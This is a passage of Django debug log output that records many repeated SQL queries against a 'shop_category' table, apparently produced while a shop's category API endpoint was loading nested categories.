FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 22:47:11,732 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 22:47:11,738 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 22:47:11,742 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 22:47:11,746 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 22:47:11,750 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 22:47:11,754 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 22:47:11,760 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 22:47:11,764 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 22:47:11,768 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 22:47:11,772 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 22:47:11,776 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 22:47:11,780 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 22:47:11,786 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 22:47:11,790 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 22:47:11,794 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 22:47:11,797 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 22:47:11,801 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 22:47:11,807 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 22:47:11,811 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 22:47:11,815 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 22:47:11,819 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 22:47:11,822 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 22:47:11,826 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 22:47:11,828 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 22:47:11,830 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 22:47:11,832 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 22:47:11,835 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 22:47:11,837 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 22:47:11,840 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 22:47:11,842 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 22:47:11,844 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 22:47:11,847 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 22:47:11,849 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 22:47:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 22:47:13,877 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 22:47:13,889 utils 2749 140297243715328 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:47:13,897 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 22:47:13,901 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 22:47:13,908 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 22:47:13,912 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 22:47:13,917 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 22:47:13,921 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 22:47:13,925 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 22:47:13,931 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 22:47:13,935 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 22:47:13,938 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 22:47:13,942 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 22:47:13,946 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 22:47:13,949 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 22:47:13,951 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 22:47:13,954 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 22:47:13,956 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 22:47:13,958 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 22:47:13,962 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 22:47:13,964 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 22:47:13,966 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 22:47:13,969 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 22:47:13,971 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 22:47:13,973 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 22:47:13,976 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 22:47:13,979 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 22:47:13,981 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 22:47:13,983 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 22:47:13,985 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 22:47:13,989 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 22:47:13,991 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 22:47:13,993 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 22:47:13,995 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 22:47:13,997 utils 2749 140297243715328 